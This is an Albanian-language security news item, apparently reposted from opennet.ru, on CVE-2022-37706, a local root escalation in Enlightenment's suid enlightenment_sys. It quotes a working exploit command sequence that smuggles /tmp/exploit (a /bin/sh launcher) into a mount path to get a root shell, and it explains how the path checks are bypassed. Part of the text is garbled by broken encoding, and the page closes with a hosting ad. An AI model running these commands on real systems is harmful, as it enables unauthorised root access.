Vulnerabilitet në mjedisin e përdoruesit Enlightenment, duke lejuar marrjen e të drejtave root.

Në mjedisin e përdoruesit Enlightenment është identifikuar një dobësi (CVE-2022-37706) që lejon një përdorues lokal me privilegje të ulta të ekzekutojë kod me të drejtat e root. Kjo dobësi nuk është rregulluar ende (0-day), por tashmë ekziston një exploit në akses të hapur, e testuar në Ubuntu 22.04.

Problemi është i pranishëm në skedarin ekzekutues enlightenment_sys, i cili ofrohet me flamurin suid root dhe ekzekuton përmes thirrjes system() disa komanda të lejuara, si montimi i një disku përmes utilitarit mount. Për shkak të veprimit të gabuar të funksionit që formon stringun që i kalon thirrjes system(), thonjëzat nga argumentet e komandës që po ekzekutohet prishen, gjë që mund të përdoret për të ekzekutuar kodin tuaj. Për shembull, gjatë ekzekutimit mkdir -p \/tmp\/net mkdir -p "/tmp/;\/tmp\/exploit" echo "/bin/sh" > \/tmp\/exploit chmod a+x \/tmp\/exploit enlightenment_sys \/bin\/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/..\/tmp/;\/tmp\/exploit" \/tmp\\/\//net

pĂ«r shkak tĂ« prishjes sĂ« thonjĂ«zave tĂ« dyfishta, nĂ« vend tĂ« komandĂ«s sĂ« specifikuar ‘\/bin\/mount 
 "/dev/..\/tmp/;\/tmp\/exploit" \/tmp\\/\//net’ nĂ« funksionin system() do tĂ« kalojĂ« njĂ« string pa thonjĂ«za tĂ« dyfishta ‘\/bin\/mount 
 \/dev/..\/tmp/;\/tmp\/exploit \/tmp\\/\//net’, gjĂ« qĂ« do tĂ« çojĂ« nĂ« ekzekutimin e veçantĂ« tĂ« komandĂ«s ‘\/tmp\/exploit \/tmp\\/\//net’ nĂ« vend tĂ« trajtimit si pjesĂ« e rrugĂ«s pĂ«r pajisjen. RrugĂ«t «\/dev/..\/tmp/» dhe «\/tmp\\/\//net» janĂ« pĂ«rcaktuar pĂ«r tĂ« anashkaluar verifikimin e argumenteve tĂ« komandĂ«s mount nĂ« enlightenment_sys (pajisja e montimit duhet tĂ« fillojĂ« me \/dev\/ dhe tĂ« tregojĂ« pĂ«r njĂ« skedar ekzistues, ndĂ«rsa tre karakteret «\/» nĂ« pikĂ«n e montimit janĂ« specifikuar pĂ«r tĂ« arritur madhĂ«sinĂ« e kĂ«rkuar tĂ« rrugĂ«s).

Burimi: opennet.ru

Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS đŸ”„ Blini hosting tĂ« besueshĂ«m pĂ«r faqe interneti me mbrojtje nga DDoS, serverĂ« VPS VDS | ProHoster